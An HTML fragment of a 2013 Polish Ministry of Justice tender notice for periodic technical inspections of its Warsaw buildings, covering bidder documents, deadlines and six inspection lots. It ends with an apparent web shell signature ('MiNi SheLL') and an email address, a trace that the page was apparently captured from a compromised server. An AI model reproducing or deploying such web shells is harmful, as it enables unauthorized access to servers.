<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Przed zawarciem umowy Wykonawca jest zobowiązany dostarczyć : kopię potwierdzoną za zgodność z oryginałem uprawnień budowlanych albo dyplomu mistrza komoniarskiego (odpowiednio dla danej części) oraz aktualną polisę ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzonej działalności.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ms.gon.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Ministerstwa Sprawiedliwości przy Al. Ujazdowskich 11  w  Warszawie; 00-950 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 14:00, miejsce: Ministerstwo Sprawiedliwości, Al. Ujazdowskie 11; 00-950 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie  okresowej,  półrocznej  kontroli stanu technicznego w zakresie branży  budowlanej obiektu  Ministerstwa Sprawiedliwości przy ul. Czerniakowskiej 100 w Warszawie, zgodnie z art. 62 ust. 1  pkt  3  ustawy  Prawo   budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623  ze  zm.),  zwanej  dalej : Prawem  budowlanym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres  kontroli  obejmuje  sprawdzenie  stanu  technicznego i bezpiecznego  użytkowania   obiektu  w  zakresie : a) elementów budynku, budowli i instalacji narażonych na szkodliwe   wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania   obiektu, b)  instalacji  i  urządzeń  służących  ochronie  środowiska, c)  sprawdzenia  wykonania  zaleceń  z  poprzedniej  kontroli, d)  opracowanie  protokołu  z  dokonanej  kontroli  stanu  technicznego  obiektu. 2. przewidywane terminy  kontroli : a)  kontrola jesienna - do 30 listopada 2013  r., b)   kontrola  wiosenna - do  31 maja  2014  r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie  okresowej,półrocznej  kontroli  stanu  technicznego  w  zakresie  branży  kominiarskiej  obiektu Ministerstwa Sprawiedliwości przy  ul. Czerniakowskiej 100  w  Warszawie,  zgodnie z art. 62 ust.1 pkt 3 Prawa budowlanego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres  kontroli  obejmuje :a)  sprawdzenie  stanu  technicznego i bezpiecznego  użytkowania  obiektu  w  zakresie  przewodów  kominowych  (dymowych,  spalinowych  i  wentylacyjnych), b)  sprawdzenie  prawidłowości  podłączeń  przewodów  i  zastosowanych  przekrojów,c) czyszczenie  przewodów  wentylacyjnych, dymowych  i  spalinowych,  z  usunięciem  zanieczyszczeń  przywracających  pełną  drożność  przewodów, d) wykonanie  pomiarów  przepływu  strumienia  powietrza  z  pełną  analizą  wpływu  na  pozostały  układ  systemu  wentylacyjnego,e)  sprawdzenie  zabezpieczeń  wylotów  kominowych  ponad  dachem, f)  wykonanie  szkiców  przewodów  kominowych,g)  sprawdzenie  wykonania  zaleceń z poprzedniej  kontroli, h) opracowanie protokołu  zdokonanej  kontroli  stanu  technicznego  obiektu.  2.  Przewidywane terminy kontroli : a)  kontrola jesienna - do 30 listopada 2013 r., b)  kontrola wiosenna -  do 31 maja 2014  r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie  okresowej,  rocznej  kontroli  stanu  technicznego  w  zakresie branży  budowlanej  obiektów  Ministerstwa  Sprawiedliwości  przy Al. Ujazdowskich 11, Al.  Ujazdowskich  19, Al. Róż 2  oraz przy ul. Chopina 1 w  Warszawie, zgodnie z  art.  62  ust. 1  pkt 1  Prawa  budowlanego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres  kontroli  obejmuje sprawdzenie  stanu  technicznego  i  bezpiecznego  użytkowania  ww.  obiektów   w  zakresie : a) elementów budynków, budowli i instalacji narażonych na szkodliwe wpływy  atmosferyczne i niszczące działanie czynników występujących podczas użytkowania obiektów, b) instalacji  i urządzeń  służących  ochronie  środowiska, c) sprawdzenia wykonania zaleceń  z poprzedniej  kontroli, d)  opracowania  protokołu  z  dokonanej  kontroli  stanu  technicznego obiektów.  2.  Przewidywane  terminy  kontroli :
a)   kontrolę obiektu przy Al. Ujazdowskich 11 należy przeprowadzić do 30 września 2013 r., b)   kontrolę  pozostałych  obiektów, tj. przy  Al. Ujazdowskich  19, Al. Róż 2  oraz  przy  ul.  Chopina  1  w  Warszawie  należy  przeprowadzić  do  15  października  2013  r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie  okresowej,  pięcioletniej  kontroli  stanu technicznego w zakresie branży budowlanej  obiektu  Ministerstwa  Sprawiedliwości  przy  Al. Ujazdowskich 11, zgodnie z art. 62 ust. 1 pkt 2  Prawa  budowlanego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres  kontroli  obejmuje : a)  sprawdzenie  w zakresie stanu  technicznego  obiektu budowlanego, b)  sprawdzenie  w zakresie przydatności do użytkowania obiektu budowlanego, c)  sprawdzenie  w zakresie estetyki obiektu budowlanego oraz jego otoczenia, d)  sprawdzenie  w zakresie bezpiecznego użytkowania obiektu, e)  sprawdzenie wykonania zaleceń z poprzedniej kontroli, f) opracowanie  protokołu z dokonanej kontroli stanu technicznego.

3)   przewidywany  termin  kontroli  -  do  30  września  2013  r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie okresowej, pięcioletniej  kontroli  stanu  technicznego  w  zakresie  branży  elektrycznej  obiektów  przy   Al.  Ujazdowskich  19,  Al.  Róż   2, ul.  Chopina  1  oraz  przy  ul. Czerniakowskiej  100  w  Warszawie, zgodnie z art. 62 ust. 1 pkt  2  Prawa  budowlanego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres  kontroli  obejmuje : a)  sprawdzenie w zakresie badania instalacji elektrycznej i piorunochronnej ze sprawdzeniem  stanu  sprawności połączeń, osprzętu,  zabezpieczeń  i  środków  ochrony  od  porażeń, oporności  izolacji  przewodów  oraz  uziemień  instalacji i aparatów,  b)  sprawdzenie   dokręcenia   zacisków   łączeniowych   przewodów  osprzętu  elektrycznego rozdzielczego, c) sprawdzenie  równomierności  obciążeń  linii  zasilających, d)  sprawdzenie  wykonania  zaleceń  z  poprzedniej  kontroli, e)  opracowanie protokołu z dokonanej kontroli stanu technicznego i pomiarów kontrolnych.  2.  Przewidywany  termin  kontroli - do 31  lipca  2013 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie okresowej, pięcioletniej oceny efektywności  energetycznej  urządzeń chłodniczych  w systemach  klimatyzacji, zgodnie z art. 62 ust.  pkt 6 Prawa budowlanego. Roczną kontrolą stanu technicznego objęte są  obiekty  przy Al. Ujazdowskich 11, Al. Ujazdowskich 19, ul.  Chopina  1  oraz  przy  ul.  Czerniakowskiej  100  w  Warszawie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres  kontroli  obejmuje  ocenę  efektywności  energetycznej  zastosowanych  urządzeń  chłodniczych  w  systemach  klimatyzacji,  ich  wielkości  w  stosunku  do  wymagań  użytkowych  o  mocy  chłodniczej  nominalnej  większej  niż  12  kW oraz  opracowanie  protokołu  z  dokonanej  oceny  technicznej. Wykaz urządzeń chłodniczych w systemach klimatyzacji, objętych kontrolą zawiera tabela w Rozdziale III ust. 2 pkt G ppkt 3  SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com